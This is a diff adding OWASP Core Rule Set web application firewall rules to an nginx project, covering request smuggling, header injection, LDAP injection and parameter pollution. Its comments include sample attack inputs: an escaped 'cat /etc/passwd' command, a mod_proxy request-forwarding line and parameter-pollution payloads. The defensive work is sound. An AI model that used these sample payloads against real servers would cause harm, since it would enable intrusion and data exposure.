tag:'paranoia-level/4',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + chain" + SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ + "setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}'" + + +# +# This is a stricter sibling of 920270. 
+# +# This rule is also triggered by the following exploit(s): +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +SecRule ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 38,44-46,48-58,61,65-90,95,97-122" \ + "id:920273,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request (outside of very strict set)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + +# +# This is a stricter sibling of 920270. +# +SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:Sec-Fetch-User|!REQUEST_HEADERS:Sec-CH-UA|!REQUEST_HEADERS:Sec-CH-UA-Mobile "@validateByteRange 32,34,38,42-59,61,65-90,95,97-122" \ + "id:920274,\ + phase:1,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request headers (outside of very strict set)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + +# +# This is a stricter sibling of 920270. +# The headers of this rule are Structured Header booleans, for which only `?0`, +# and `?1` are inconspicuous. 
+# Structured Header boolean: https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-header-structure-19#section-3.3.6 +# Sec-Fetch-User: https://www.w3.org/TR/fetch-metadata/#http-headerdef-sec-fetch-user +# Sec-CH-UA-Mobile: https://wicg.github.io/ua-client-hints/#sec-ch-ua-mobile +# +SecRule REQUEST_HEADERS:Sec-Fetch-User|REQUEST_HEADERS:Sec-CH-UA-Mobile "!@rx ^(?:\?[01])?$" \ + "id:920275,\ + phase:1,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request headers (outside of very strict set)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + +# -=[ Abnormal Character Escapes ]=- +# +# [ Rule Logic ] +# Consider the following payload: arg=cat+/e\tc/pa\ssw\d +# Here, \s and \d were only used to obfuscate the string passwd and a lot of +# parsers will silently ignore the non-necessary escapes. The case with \t is +# a bit different though, as \t is a natural escape for the TAB character, +# so we will avoid this (and \n, \r, etc.). +# +# This rule aims to detect non-necessary, abnormal escapes. You could say it is +# a nice way to forbid the backslash character where it is not needed. +# +# This is a new rule at paranoia level 4. We expect quite a few false positives +# for this rule and we will later evaluate if the rule makes any sense at all. +# The rule is redundant with 920273 and 920274 in PL4. But if the rule proofs +# to be useful and false positives remain at a reasonable level, then it might +# be shifted to PL3 in a future release, where it would be the only rule +# covering the backslash escape. +# +# We forbid backslashes followed by a list of basic ascii characters - unless +# the backslash is preceded by another backslash. 
+#
+# This rule is also triggered by the following exploit(s):
+# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ]
+#
+SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\x5c])\x5c[cdeghijklmpqwxyz123456789]" \
+ "id:920460,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:htmlEntityDecode,t:lowercase,\
+ msg:'Abnormal character escapes in request',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/4',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/153/267',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
+
+
+#
+# -= Paranoia Levels Finished =-
+#
+SecMarker "END-REQUEST-920-PROTOCOL-ENFORCEMENT"
diff --git a/nginx/config/owasp-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf b/nginx/config/owasp-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf
new file mode 100644
index 00000000..5861bf5a
--- /dev/null
+++ b/nginx/config/owasp-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf
@@ -0,0 +1,561 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# -= Paranoia Level 0 (empty) =- (apply unconditionally)
+#
+
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+#
+# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
+#
+
+#
+# -=[ HTTP Request Smuggling ]=-
+#
+# [ Rule Logic ]
+# This rule looks for a HTTP / WEBDAV method name in combination with the word http/\d or a CR/LF character.
+# This would point to an attempt to inject a 2nd request into the request, thus bypassing
+# tests carried out on the primary request.
+#
+# [ References ]
+# http://projects.webappsec.org/HTTP-Request-Smuggling
+#
+SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connect|put|delete|trace|track|patch|propfind|propatch|mkcol|copy|move|lock|unlock)\s+[^\s]+\s+http/\d" \
+ "id:921110,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:htmlEntityDecode,t:lowercase,\
+ msg:'HTTP Request Smuggling Attack',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272/220/33',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+#
+# -=[ HTTP Response Splitting ]=-
+#
+# [ Rule Logic ]
+# These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters.
+# These characters may cause problems if the data is returned in a response header and
+# may be interpreted by an intermediary proxy server and treated as two separate
+# responses.
+# +# [ References ] +# http://projects.webappsec.org/HTTP-Response-Splitting +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx [\r\n]\W*?(?:content-(?:type|length)|set-cookie|location):\s*\w" \ + "id:921120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'HTTP Response Splitting Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/34',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\bhttp/\d|<(?:html|meta)\b)" \ + "id:921130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:htmlEntityDecode,t:lowercase,\ + msg:'HTTP Response Splitting Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/34',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# -=[ HTTP Header Injection ]=- +# +# [ Rule Logic ] +# These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters, +# on their own or in combination with header field names. +# These characters may cause problems if the data is returned in a response header +# and interpreted by the client. +# The rules are similar to rules defending against the HTTP Request Splitting and +# Request Smuggling rules. 
+# +# [ References ] +# https://en.wikipedia.org/wiki/HTTP_header_injection +# +SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \ + "id:921140,\ + phase:1,\ + block,\ + capture,\ + t:none,t:htmlEntityDecode,\ + msg:'HTTP Header Injection Attack via headers',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/273',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# Detect newlines in argument names. +# Checking for GET arguments has been moved to paranoia level 2 (921151) +# in order to mitigate possible false positives. +# +# This rule is also triggered by the following exploit(s): +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +SecRule ARGS_NAMES "@rx [\n\r]" \ + "id:921150,\ + phase:2,\ + block,\ + capture,\ + t:none,t:htmlEntityDecode,\ + msg:'HTTP Header Injection Attack via payload (CR/LF detected)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/33',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cookie|(?:x-)?(?:forwarded-(?:for|host|server)|host|via|remote-ip|remote-addr|originating-IP))\s*:" \ + "id:921160,\ + phase:1,\ + block,\ + capture,\ + t:none,t:htmlEntityDecode,t:lowercase,\ + 
msg:'HTTP Header Injection Attack via payload (CR/LF and header-name detected)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/33',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# -=[ HTTP Splitting ]=- +# +# This rule detect \n or \r in the REQUEST FILENAME +# Reference: https://wiki.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016) +# Reference: https://owasp.org/www-project-web-security-testing-guide/assets/archive/OWASP_Testing_Guide_v4.pdf +# +SecRule REQUEST_FILENAME "@rx [\n\r]" \ + "id:921190,\ + phase:1,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'HTTP Splitting (CR/LF in request filename detected)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/34',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ LDAP Injection ]=- +# +# [ Rule Logic ] +# +# This is a rule trying to prevent LDAP injection. It is based on a BlackHat presentation by Alonso Parada +# and regex writing by Denis Kolegov. 
+# +# [ References ] +# * https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf +# * https://www.sonarsource.com/blog/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/ +# * https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/276#issue-126581660 + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^[^:\(\)\&\|\!\<\>\~]*\)\s*(?:\((?:[^,\(\)\=\&\|\!\<\>\~]+[><~]?=|\s*[&!|]\s*(?:\)|\()?\s*)|\)\s*\(\s*[\&\|\!]\s*|[&!|]\s*\([^\(\)\=\&\|\!\<\>\~]+[><~]?=[^:\(\)\&\|\!\<\>\~]*)" \ + "id:921200,\ + phase:2,\ + block,\ + capture,\ + t:none,t:htmlEntityDecode,\ + msg:'LDAP Injection Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-ldap',\ + tag:'platform-multi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/136',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# -=[ Body Processor Bypass ]=- +# +# [ Rule Logic ] +# +# This rule intends to detect content types in the Content-Type header outside of the actual content type declaration. +# This prevents bypasses targeting the Modsecurity recommended rules controlling which body processor is used. +# +# Regular expression generated from regex-assembly/921421.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 921421 +# +SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\v,;]+[\s\v,;].*?(?:application/(?:.+\+)?json|(?:application/(?:soap\+)?|text/)xml)" \ + "id:921421,\ + phase:1,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Content-Type header: Dangerous content type outside the mime type declaration',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# Rule against CVE-2021-40438: +# A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. +# This issue affects Apache HTTP Server 2.4.48 and earlier. 
+# GET /?unix:AAAAAAAAAAAAA|http://coreruleset.org/ +# +SecRule REQUEST_URI "@rx unix:[^|]*\|" \ + "id:921240,\ + phase:1,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'mod_proxy attack attempt detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-apache',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/33',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# + + +# Detect newlines in GET argument values. +# These may point to a HTTP header injection attack, but can also sometimes +# occur in benign query parameters. 
+# +# See also: rule 921140, 921150 +# +SecRule ARGS_GET "@rx [\n\r]" \ + "id:921151,\ + phase:1,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:htmlEntityDecode,\ + msg:'HTTP Header Injection Attack via payload (CR/LF detected)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/33',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# -=[ Body Processor Bypass ]=- +# +# [ Rule Logic ] +# +# This rule intends to detect content types in the Content-Type header outside of the actual content type declaration. +# +# [ References ] +# * See rule 921422 +# +# Regular expression generated from regex-assembly/921422.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 921422 +# +SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\v,;]+[\s\v,;].*?\b(?:((?:tex|multipar)t|application)|((?:audi|vide)o|image|cs[sv]|(?:vn|relate)d|p(?:df|lain)|json|(?:soa|cs)p|x(?:ml|-www-form-urlencoded)|form-data|x-amf|(?:octe|repor)t|stream)|([\+/]))\b" \ + "id:921422,\ + phase:1,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Content-Type header: Dangerous content type outside the mime type declaration',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + 
setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) +# +# + +# Forbid Request Range Header +# +# It is possible abuse the HTTP Request Range Header to leak error pages +# and other information in very small snippets. +# The easiest way to fight this is to deny the use of this header. +# This is a viable option since the header is only used in rare circumstances +# anymore. +# If it is necessary to use it in a certain setup, then it is best to +# create a rule exclusion for a given URI and this rule ID as a workaround. +# +SecRule &REQUEST_HEADERS:Range "@gt 0" \ + "id:921230,\ + phase:1,\ + block,\ + t:none,\ + msg:'HTTP Range Header detected',\ + logdata:'Matched Data: Header %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# -=[ HTTP Parameter Pollution ]=- +# +# [ Rule Logic ] +# These rules look for multiple parameters with the same name. +# 921170 counts the occurrences of the individual parameters. +# 921180 checks if any counter is > 1. +# +# One HPP attack vector is to try evade signature filters by distributing the +# attack payload across multiple parameters with the same name. 
+# This works as many security devices only apply signatures to individual +# parameter payloads, however the back-end web application may (in the case +# of ASP.NET) consolidate all of the payloads into one thus making the +# attack payload active. +# +# [ References ] +# http://tacticalwebappsec.blogspot.com/2009/05/http-parameter-pollution.html +# https://capec.mitre.org/data/definitions/460.html +# +SecRule ARGS_NAMES "@rx ." \ + "id:921170,\ + phase:2,\ + pass,\ + nolog,\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/137/15/460',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'TX.paramcounter_%{MATCHED_VAR_NAME}=+1'" + +SecRule TX:/paramcounter_.*/ "@gt 1" \ + "id:921180,\ + phase:2,\ + pass,\ + msg:'HTTP Parameter Pollution (%{TX.1})',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/137/15/460',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule MATCHED_VARS_NAMES "@rx TX:paramcounter_(.*)" \ + "capture,\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# -=[ HTTP Parameter Pollution ]=- +# +# [ Rule Logic ] +# Parameter pollution rule 921180 PL3 can by bypassed when a weak backend parameter +# parser is ignoring additional characters in a parameter array name after the +# closing of the array. +# Rule 921210 PL3 prevents this by disallowing arbitrary strings after an array has +# been closed or inbetween the square brackets in multidimensional arrays. +# Please note that rule 921210 allows for 2-dimensional, but not for higher dimensional +# arrays. 
If these are flagged as attacks, a rule exclusion will have to be +# deployed; ideally for the parameter(s) in question. +# +# [ References ] +# Private bug bounty in Spring 2022, findings Z05OZUCH. +# +# [ Payloads ] +# * foo[1]a=bar&foo[1]b= - parameter parsers often cut after the closing of +# the array. 921180 PL3 takes the full name, though. +# This impediance mismatch allows for bypasses. +# * foo[1]x[1]=bar&foo[1]x[2]= - extension of 1; this has the advantage that +# the parameter name does end with "]" just like a valid array notation. +# +SecRule ARGS_NAMES "@rx (][^\]]+$|][^\]]+\[)" \ + "id:921210,\ + phase:2,\ + pass,\ + log,\ + msg:'HTTP Parameter Pollution after detecting bogus char after parameter array',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/137/15/460',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +# +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) +# + +# -=[ HTTP Parameter Pollution ]=- +# +# [ Rule Logic ] +# Parameter pollution rule 921180 PL3 and 921210 PL3 can by bypassed if a +# weak backend parameter parser ignores parameter array alltogether at +# cuts parameter names at the first occurrence of the "[" character. +# The rule 921220 PL4 prevents this by disallowing parameter array names. 
+# +# If an application needs parameter array names, then this rule should be +# disabled, ideally by issueing a rule exclusion for the parameter names +# that need it. +# +# [ References ] +# Private bug bounty in Spring 2022, finding 5UXE4RK0. +# +# [ Payloads ] +# * foo[1]=bar&foo[2]= +# * foo=bar&foo[1]= +# * foo[1]=bar&foo[1]acb]= - this is an edge case that 921210 PL3 is not +# able to catch since the parameter name ends with "]". +# +SecRule ARGS_NAMES "@rx \[" \ + "id:921220,\ + phase:2,\ + pass,\ + log,\ + msg:'HTTP Parameter Pollution possible via array notation',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/137/15/460',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-921-PROTOCOL-ATTACK" diff --git a/nginx/config/owasp-crs/rules/REQUEST-922-MULTIPART-ATTACK.conf b/nginx/config/owasp-crs/rules/REQUEST-922-MULTIPART-ATTACK.conf new file mode 100644 index 00000000..34500453 --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-922-MULTIPART-ATTACK.conf 
@@ -0,0 +1,92 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + +# This file is to address the 3UWMWA6W vulnerability. +# It requires ModSecurity version 2.9.6 or 3.0.8 (or an updated version with backports +# of the security fixes in these versions) or a compatible engine supporting these changes. +# +# If you cannot upgrade ModSecurity, this file will cause ModSecurity to fail to start. +# In that case, you can temporarily delete this file. However, you will be missing +# protection from these rules. Therefore, we recommend upgrading your engine instead. + +# The rules in this file will be part of the 920 / 921 in the future. 
+ +# Only allow specific charsets when using "_charset_" +# Note: this is in phase:2 because these are headers that come in the body +SecRule &MULTIPART_PART_HEADERS:_charset_ "!@eq 0" \ + "id:922100,\ + phase:2,\ + block,\ + t:none,\ + msg:'Multipart content type global _charset_ definition is not allowed by policy',\ + logdata:'Matched Data: %{ARGS._charset_}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-multipart-header',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule ARGS:_charset_ "!@within |%{tx.allowed_request_content_type_charset}|" \ + "t:lowercase,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# Only allow specific charsets same as Rule 920600 +# Note: this is in phase:2 because these are headers that come in the body +SecRule MULTIPART_PART_HEADERS "@rx ^content-type\s*:\s*(.*)$" \ + "id:922110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Illegal MIME Multipart Header content-type: charset parameter',\ + logdata:'Matched Data: %{TX.1} found within Content-Type multipart form',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + 